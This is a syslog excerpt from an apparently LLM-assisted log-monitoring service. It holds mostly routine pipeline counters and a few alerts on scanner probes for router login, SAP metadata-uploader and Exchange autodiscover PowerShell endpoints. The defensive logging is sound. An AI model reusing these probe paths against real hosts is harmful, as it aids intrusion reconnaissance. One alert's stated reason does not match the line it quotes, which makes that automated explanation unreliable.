Mar 20 07:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:54:31.939978 [observer] Patterns: hash=2914 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:55:01.981357 [observer] Pipeline: processed=2979 pattern_hits=2916 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:55:01.981396 [observer] Patterns: hash=2916 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:55:31.935654 [observer] Pipeline: processed=2985 pattern_hits=2922 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:55:31.935688 [observer] Patterns: hash=2922 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:56:01.953092 [observer] Pipeline: processed=2987 pattern_hits=2924 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:56:01.953120 [observer] Patterns: hash=2924 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:56:31.933917 [observer] Pipeline: processed=2991 pattern_hits=2928 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:56:31.933943 [observer] Patterns: hash=2928 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:57:01.951585 [observer] Pipeline: processed=2993 pattern_hits=2930 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:57:01.951616 [observer] Patterns: hash=2930 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:57:31.934024 [observer] Pipeline: processed=2996 pattern_hits=2933 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:57:31.934055 [observer] Patterns: hash=2933 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:58:01.941243 [observer] Pipeline: processed=2999 pattern_hits=2936 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:58:01.941270 [observer] Patterns: hash=2936 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:58:31.950573 [observer] Pipeline: processed=3001 pattern_hits=2938 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:58:31.950602 [observer] Patterns: hash=2938 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:59:01.953234 [observer] Pipeline: processed=3005 pattern_hits=2942 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:59:01.953259 [observer] Patterns: hash=2942 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:59:31.945058 [observer] Pipeline: processed=3007 pattern_hits=2944 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:59:31.945087 [observer] Patterns: hash=2944 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:00:01.956183 [observer] Pipeline: processed=3011 pattern_hits=2948 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:00:01.956806 [observer] Patterns: hash=2948 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:00:31.944528 [observer] Pipeline: processed=3013 pattern_hits=2950 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:00:31.944561 [observer] Patterns: hash=2950 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:01:01.944041 [observer] Pipeline: processed=3018 pattern_hits=2955 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:01:01.944074 [observer] Patterns: hash=2955 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:01:31.934915 [observer] Pipeline: processed=3021 pattern_hits=2958 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:01:31.934941 [observer] Patterns: hash=2958 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:02:01.966560 [observer] Pipeline: processed=3023 pattern_hits=2960 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:02:01.966599 [observer] Patterns: hash=2960 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:02:31.934089 [observer] Pipeline: processed=3027 pattern_hits=2964 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:02:31.934124 [observer] Patterns: hash=2964 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:03:01.953974 [observer] Pipeline: processed=3029 pattern_hits=2966 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:03:01.954007 [observer] Patterns: hash=2966 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:03:31.935374 [observer] Pipeline: processed=3033 pattern_hits=2970 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:03:31.935401 [observer] Patterns: hash=2970 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:04:01.970638 [observer] Pipeline: processed=3035 pattern_hits=2972 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:04:01.970670 [observer] Patterns: hash=2972 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:04:31.934654 [observer] Pipeline: processed=3038 pattern_hits=2975 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:04:31.934679 [observer] Patterns: hash=2975 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:05:01.955880 [observer] Pipeline: processed=3041 pattern_hits=2978 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:05:01.956097 [observer] Patterns: hash=2978 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:05:31.952186 [observer] Pipeline: processed=3043 pattern_hits=2980 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:05:31.952213 [observer] Patterns: hash=2980 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:06:01.946987 [observer] Pipeline: processed=3049 pattern_hits=2986 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:06:01.947016 [observer] Patterns: hash=2986 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:06:31.945683 [observer] Pipeline: processed=3051 pattern_hits=2988 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:06:31.945717 [observer] Patterns: hash=2988 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:07:01.956059 [observer] Pipeline: processed=3055 pattern_hits=2992 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:07:01.956095 [observer] Patterns: hash=2992 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:07:31.938777 [observer] Pipeline: processed=3057 pattern_hits=2994 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:07:31.938803 [observer] Patterns: hash=2994 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:08:01.942845 [observer] Pipeline: processed=3060 pattern_hits=2997 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:08:01.942877 [observer] Patterns: hash=2997 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:08:31.935281 [observer] Pipeline: processed=3063 pattern_hits=3000 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:08:31.935311 [observer] Patterns: hash=3000 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:09:01.964939 [observer] Pipeline: processed=3065 pattern_hits=3002 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:09:01.965045 [observer] Patterns: hash=3002 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:09:31.935613 [observer] Pipeline: processed=3069 pattern_hits=3006 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:09:31.935660 [observer] Patterns: hash=3006 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:10:01.938620 [observer] Pipeline: processed=3071 pattern_hits=3008 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:10:01.938645 [observer] Patterns: hash=3008 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:10:31.934910 [observer] Pipeline: processed=3075 pattern_hits=3012 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:10:31.934935 [observer] Patterns: hash=3012 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:11:01.949007 [observer] Pipeline: processed=3079 pattern_hits=3016 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:11:01.949036 [observer] Patterns: hash=3016 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:11:31.936380 [observer] Pipeline: processed=3082 pattern_hits=3019 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:11:31.936405 [observer] Patterns: hash=3019 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:12:01.946353 [observer] Pipeline: processed=3085 pattern_hits=3022 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:12:01.946384 [observer] Patterns: hash=3022 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:12:31.943758 [observer] Pipeline: processed=3087 pattern_hits=3024 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:12:31.943784 [observer] Patterns: hash=3024 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:01.946686 [observer] Pipeline: processed=3091 pattern_hits=3028 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:01.946715 [observer] Patterns: hash=3028 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 08:13:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:23.927848 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T08:13:23.927585113Z 129.211.7.73 - - [20/Mar/2026:08:13:23 +0000] "_" "POST /goform/websLogin HTTP/1.1" 400 150 "-" "-" "-"
Mar 20 08:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:31.938839 [observer] Pipeline: processed=3094 pattern_hits=3031 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:31.938869 [observer] Patterns: hash=3031 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:14:01.943196 [observer] Pipeline: processed=3098 pattern_hits=3035 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:14:01.943339 [observer] Patterns: hash=3035 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:14:31.945544 [observer] Pipeline: processed=3100 pattern_hits=3037 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:14:31.945576 [observer] Patterns: hash=3037 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:15:01.950721 [observer] Pipeline: processed=3103 pattern_hits=3040 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:15:01.950757 [observer] Patterns: hash=3040 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:15:31.934611 [observer] Pipeline: processed=3106 pattern_hits=3043 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:15:31.934637 [observer] Patterns: hash=3043 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:16:01.942723 [observer] Pipeline: processed=3110 pattern_hits=3047 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:16:01.942748 [observer] Patterns: hash=3047 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:16:31.939757 [observer] Pipeline: processed=3114 pattern_hits=3051 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:16:31.939801 [observer] Patterns: hash=3051 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:17:01.958291 [observer] Pipeline: processed=3116 pattern_hits=3053 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:17:01.958320 [observer] Patterns: hash=3053 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:17:31.935469 [observer] Pipeline: processed=3120 pattern_hits=3057 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:17:31.935493 [observer] Patterns: hash=3057 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:18:01.954500 [observer] Pipeline: processed=3122 pattern_hits=3059 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:18:01.954547 [observer] Patterns: hash=3059 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:18:31.935565 [observer] Pipeline: processed=3125 pattern_hits=3062 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:18:31.935592 [observer] Patterns: hash=3062 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:19:01.936951 [observer] Pipeline: processed=3128 pattern_hits=3065 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:19:01.936980 [observer] Patterns: hash=3065 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:19:31.944103 [observer] Pipeline: processed=3130 pattern_hits=3067 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:19:31.944130 [observer] Patterns: hash=3067 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:01.947887 [observer] Pipeline: processed=3134 pattern_hits=3071 llm_calls=63 llm_errors=0 learned=0
Mar 20 08:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:01.948039 [observer] Patterns: hash=3071 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63
Mar 20 08:20:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:28.176874 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 08:20:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:28.176911 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 08:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:31.935148 [observer] Pipeline: processed=3138 pattern_hits=3073 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:31.935610 [observer] Patterns: hash=3073 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=65
Mar 20 08:20:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:32.284588 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 08:20:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:32.284629 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 08:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:21:01.964895 [observer] Pipeline: processed=3144 pattern_hits=3079 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:21:01.964926 [observer] Patterns: hash=3079 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=65
Mar 20 08:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:21:31.944478 [observer] Pipeline: processed=3146 pattern_hits=3081 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:21:31.944504 [observer] Patterns: hash=3081 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=65
Mar 20 08:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:01.944194 [observer] Pipeline: processed=3149 pattern_hits=3084 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:01.944225 [observer] Patterns: hash=3084 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=65
Mar 20 08:22:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:27.492206 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx error shows a GET to /developmentserver/metadatauploader with a missing file; could indicate probing for a metadata uploader endpoint. Line=2026-03-20T08:22:27.491906194Z 2026/03/20 08:22:27 [error] 422#422: *747382 open() "/usr/share/nginx/default/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.169.4...
Mar 20 08:22:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:27.492271 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T08:22:27.492006176Z 20.169.48.140 - - [20/Mar/2026:08:22:27 +0000] "54.200.221.0" "GET /developmentserver/metadatauploader HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 08:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:31.939456 [observer] Pipeline: processed=3154 pattern_hits=3089 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:31.939485 [observer] Patterns: hash=3089 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:23:01.953735 [observer] Pipeline: processed=3156 pattern_hits=3091 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:23:01.953763 [observer] Patterns: hash=3091 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:23:31.934411 [observer] Pipeline: processed=3160 pattern_hits=3095 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:23:31.934436 [observer] Patterns: hash=3095 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:24:01.945670 [observer] Pipeline: processed=3162 pattern_hits=3097 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:24:01.945704 [observer] Patterns: hash=3097 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:24:31.934056 [observer] Pipeline: processed=3166 pattern_hits=3101 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:24:31.934088 [observer] Patterns: hash=3101 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:25:01.952206 [observer] Pipeline: processed=3168 pattern_hits=3103 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:25:01.952235 [observer] Patterns: hash=3103 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:25:31.935212 [observer] Pipeline: processed=3171 pattern_hits=3106 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:25:31.935246 [observer] Patterns: hash=3106 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:26:01.937553 [observer] Pipeline: processed=3174 pattern_hits=3109 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:26:01.937717 [observer] Patterns: hash=3109 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:26:31.946638 [observer] Pipeline: processed=3178 pattern_hits=3113 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:26:31.946668 [observer] Patterns: hash=3113 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:27:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:27:02.032857 [observer] Pipeline: processed=3182 pattern_hits=3117 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:27:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:27:02.033089 [observer] Patterns: hash=3117 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:27:31.935460 [observer] Pipeline: processed=3184 pattern_hits=3119 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:27:31.935494 [observer] Patterns: hash=3119 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:28:01.943191 [observer] Pipeline: processed=3188 pattern_hits=3123 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:28:01.945232 [observer] Patterns: hash=3123 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:28:31.933862 [observer] Pipeline: processed=3190 pattern_hits=3125 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:28:31.933885 [observer] Patterns: hash=3125 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:01.990034 [observer] Pipeline: processed=3193 pattern_hits=3128 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:01.990232 [observer] Patterns: hash=3128 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
Mar 20 08:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:31.936787 [observer] Pipeline: processed=3196 pattern_hits=3131 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:31.936816 [observer] Patterns: hash=3131 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65
